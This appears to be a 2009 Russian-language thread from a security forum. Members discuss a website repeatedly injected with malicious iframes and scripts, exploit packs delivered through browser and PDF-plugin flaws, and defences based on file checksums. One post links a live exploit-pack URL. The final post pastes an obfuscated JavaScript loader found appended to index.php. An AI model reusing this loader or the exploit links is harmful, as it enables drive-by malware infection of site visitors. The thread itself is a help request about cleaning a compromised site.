HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.06.2009, 19:32
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
С нами: 10233548

Репутация: 1118


По умолчанию

Цитата:
PDF Reader'a
а ты думаеш что этот плагин является образцово показательной программой и не содержит дырок?
 
Ответить с цитированием

  #12  
Старый 15.06.2009, 19:41
Dobby007
Познающий
Регистрация: 07.09.2008
Сообщений: 55
С нами: 9302441

Репутация: 57
По умолчанию

Цитата:
Сообщение от POS_troi  
а ты думаеш что этот плагин является образцово показательной программой и не содержит дырок?
Нет. Я так не думаю. Просто стало интересно как такое можно осуществить... И я думаю не только одному мне...

Последний раз редактировалось Dobby007; 15.06.2009 в 19:45..
 
Ответить с цитированием

  #13  
Старый 15.06.2009, 19:47
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
С нами: 10233548

Репутация: 1118


По умолчанию

ну допустим почитай тут

http://www.securitylab.ru/vulnerability/362445.php
 
Ответить с цитированием

  #14  
Старый 15.06.2009, 19:56
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами: 10200612

Репутация: 168
По умолчанию

http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144
 
Ответить с цитированием

  #15  
Старый 15.06.2009, 20:00
Dobby007
Познающий
Регистрация: 07.09.2008
Сообщений: 55
С нами: 9302441

Репутация: 57
По умолчанию

Цитата:
Сообщение от POS_troi  
ну допустим почитай тут
http://www.securitylab.ru/vulnerability/362445.php
Цитата:
http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144
+1
 
Ответить с цитированием

  #16  
Старый 15.06.2009, 20:06
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

Много связок грузятся через яваскрипт, неужели трудна разработчикам браузеров проконтролировать действия яваскрипта? Я видел как исхещряюца с кодом чтобы обмануть браузер,но все же... По поводу pdf, интересная идея, грузить троя через дыру в плагине.. Фантазии нет придела!
А чтобы не вычищать каждый день ифрэймы и яваскрипты, то надо хранить на балванке копию сайта и если какието произошли изменения, то файлики обновить и все, просто если сайт большой, замаешься чистить. А еще хорошо спрятанный шелл хрен найдешь.
 
Ответить с цитированием

  #17  
Старый 15.06.2009, 20:31
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Цитата:
Сообщение от POS_troi  
для начала с автора нужно вытащить инфу о версии двига =)
самописный
 
Ответить с цитированием

  #18  
Старый 15.06.2009, 20:49
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
С нами: 10233548

Репутация: 1118


По умолчанию

Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
 
Ответить с цитированием

  #19  
Старый 16.06.2009, 18:18
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами: 9796693

Репутация: 659


По умолчанию

Цитата:
Сообщение от POS_troi  
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
такие хитроумные админы на gov-ах часто попадаются
 
Ответить с цитированием

  #20  
Старый 17.06.2009, 11:30
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Блин, сегодня захожу, там уже другая ***ня:
Код HTML:
<script language="javascript">function _lUPNLpHJVX7T3P( _lXm9tW7QM2MwHU ){var _lxQthEExSQdZZz = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";var _lxXJqmgSlQpjg1 = '';var _lbtojDbzx931xM = 18;var _lHQlhGZ4PFhvYJ = 0;for ( var _lBDsi5JRjsUAiH = 0; _lBDsi5JRjsUAiH < _lXm9tW7QM2MwHU.length; _lBDsi5JRjsUAiH++ ) { var _l9b9wnGDPoJpiY = _lxQthEExSQdZZz.indexOf( _lXm9tW7QM2MwHU.charAt( _lBDsi5JRjsUAiH ) ); if ( _lbtojDbzx931xM == 0 ) { _lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY; var _luGKJPMN7vIHCr = ( _lHQlhGZ4PFhvYJ & 0xFF0000 ) >> 16;if ( _luGKJPMN7vIHCr != 0 ) {_lxXJqmgSlQpjg1 += String.fromCharCode( _luGKJPMN7vIHCr );}var _l0XsYfs0eeeliu = ( _lHQlhGZ4PFhvYJ & 0xFF00 ) >> 8;if ( _l0XsYfs0eeeliu != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _l0XsYfs0eeeliu );}var _lPrZyGK4RUKehH = _lHQlhGZ4PFhvYJ & 0xFF;if ( _lPrZyGK4RUKehH != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _lPrZyGK4RUKehH );}_lHQlhGZ4PFhvYJ = 0;_lbtojDbzx931xM    = 18;} else {_l9b9wnGDPoJpiY = _l9b9wnGDPoJpiY << _lbtojDbzx931xM;_lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY;_lbtojDbzx931xM -= 6;}}return _lxXJqmgSlQpjg1;} document.write( _lUPNLpHJVX7T3P( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOaXGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );</script>
Помогите, хелп, приклеевается в конец документа index.php Что делать? Вири на компе подавил
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакеры научились помещать вредоносный код в BIOS FraiDex Мировые новости. Обсуждения. 3 30.03.2009 12:16
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
Вредоносный код может быть записан в Bios при помощи Acpi dinar_007 Мировые новости. Обсуждения. 0 30.01.2006 16:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.